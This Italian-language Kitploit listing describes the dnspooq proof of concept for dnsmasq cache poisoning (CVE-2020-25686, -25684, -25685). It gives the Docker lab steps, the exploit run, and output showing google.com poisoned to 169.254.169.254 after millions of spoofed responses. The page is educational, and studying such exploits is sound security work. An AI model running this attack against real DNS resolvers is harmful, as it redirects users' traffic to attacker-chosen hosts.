Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
dnspooq — DNSpooq - avvelenamento della cache di dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) | Kitploit
Strumenti/GitHubGitHub/knqyf263/dnspooq
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneAnalisi DNS
GitHubknqyf263/dnspooq

dnspooq

DNSpooq - avvelenamento della cache di dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

Vedi Repository
1013735 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

dnspooq

DNSpooq PoC - avvelenamento della cache dnsmasq (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

Solo per scopi educativi

Requisiti

  • Docker compose
  • Docker

Exploit

dnspooq

Avvia i contenitori

root@kitploit:~
$ docker-compose up -d

Esegui exploit.py

root@kitploit:~
$ docker-compose exec attacker bash
bash-5.0# python exploit.py
Querying non-cached names...
Generating spoofed packets...
Poisoned: b'google.com.' => 169.254.169.254
sent 3032017 responses in 50.309 seconds

Visualizza l'output del contenitore forwarder

root@kitploit:~
$ docker-compose logs -f forwarder
...
forwarder_1  | dnsmasq[1]: query[A] example.com from 10.10.0.3
forwarder_1  | dnsmasq[1]: forwarded example.com to 10.10.0.4
forwarder_1  | dnsmasq[1]: cached example.com is <CNAME>
forwarder_1  | dnsmasq[1]: cached google.com is 169.254.169.254

Visualizza l'output del contenitore cache

root@kitploit:~
$ docker-compose logs -f cache
Attaching to dnspooq_cache_1
cache_1      | Sniffing...
cache_1      | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1      | Source port: 16718, TXID: 54280, Query: b'example.com.'
...
cache_1      | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 24160, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 18189, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 40361, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 13100, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 47303, Query: b'example.com.'

Riferimenti

  • https://www.jsof-tech.com/disclosures/dnspooq/
  • https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

Autore

Teppei Fukuda

Scarica lo strumento